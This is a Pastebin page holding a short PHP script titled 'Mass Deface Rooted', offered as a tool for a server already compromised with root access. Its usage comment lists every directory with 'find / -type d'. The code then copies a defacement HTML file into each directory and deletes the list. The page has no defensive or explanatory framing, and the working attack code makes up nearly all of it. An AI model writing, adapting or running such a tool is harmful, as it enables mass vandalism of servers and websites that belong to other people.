Advertisement
mrfmr

[PHP] Mass Deface Rooted

May 20th, 2018
211
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.33 KB | None | 0 0
  1. <?php
  2. /*
  3. AUTHOR : T3754K1T1
  4. USAGE : find / -type d > tersakiti.txt && php thisfile.php urFileDeface.html
  5. */
  6. echo "\nScanning all dir.....\n";
  7. $anu = explode("\n", file_get_contents('tersakiti.txt'));
  8. foreach($anu as $lol){
  9. copy($argv[1],$lol."/".$argv[1]);
  10. echo "Success > ".$lol."/".$argv[1]."\n";
  11. }
  12. unlink("tersakiti.txt");
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement